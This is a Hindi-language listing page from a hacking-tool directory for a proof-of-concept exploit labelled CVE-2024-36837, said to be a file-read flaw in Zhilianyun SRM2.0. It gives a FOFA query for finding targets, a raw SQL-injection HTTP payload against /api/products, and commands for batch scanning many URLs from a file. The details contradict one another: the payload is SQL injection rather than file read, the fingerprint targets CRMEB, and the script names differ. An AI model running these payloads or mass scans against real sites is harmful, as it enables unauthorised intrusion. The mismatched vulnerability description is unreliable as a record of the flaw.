Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-36837 — CVE-2024-36837 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Zhilianyun SRM2.0 में एक बिना प्रमाणीकरण के मनमाना फ़ाइल पढ़ने की भेद्यता है। इसमें Python स्क्रिप्ट के माध्यम से बैच स्कैनिंग और एकल-लक्ष्य परीक्षण शामिल है। | Kitploit
उपकरण/GitHubGitHub/lhc321-source/cve-2024-36837
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHublhc321-source/cve-2024-36837

CVE-2024-36837

CVE-2024-36837 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Zhilianyun SRM2.0 में एक बिना प्रमाणीकरण के मनमाना फ़ाइल पढ़ने की भेद्यता है। इसमें Python स्क्रिप्ट के माध्यम से बैच स्कैनिंग और एकल-लक्ष्य परीक्षण शामिल है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

README.md

#CVE-2024-36837

अस्वीकरण

#智联云采 SRM2.0 runtimeLog/download इंटरफ़ेस में मनमाना फ़ाइल पढ़ने की कमज़ोरी है, बिना प्रमाणीकरण के हमलावर इस कमज़ोरी के माध्यम से सिस्टम की महत्वपूर्ण फ़ाइलें (जैसे डेटाबेस कॉन्फ़िगरेशन फ़ाइलें, सिस्टम कॉन्फ़िगरेशन फ़ाइलें) आदि पढ़ सकता है, जिससे वेबसाइट अत्यधिक असुरक्षित स्थिति में आ जाती है।

fofa सिंटैक्स: body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"

#POC:

GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip

url के आगे http:// या https:// जोड़ें

python 11.py

उपयोग कैसे करें

python cve.py -h

बैच जांच

url.txt में url पते को http:// या https:// होना चाहिए python cve.py -f url.txt

एकल जांच

url पता http:// या https:// होना चाहिए python cve.py -u url

टूल डाउनलोड करें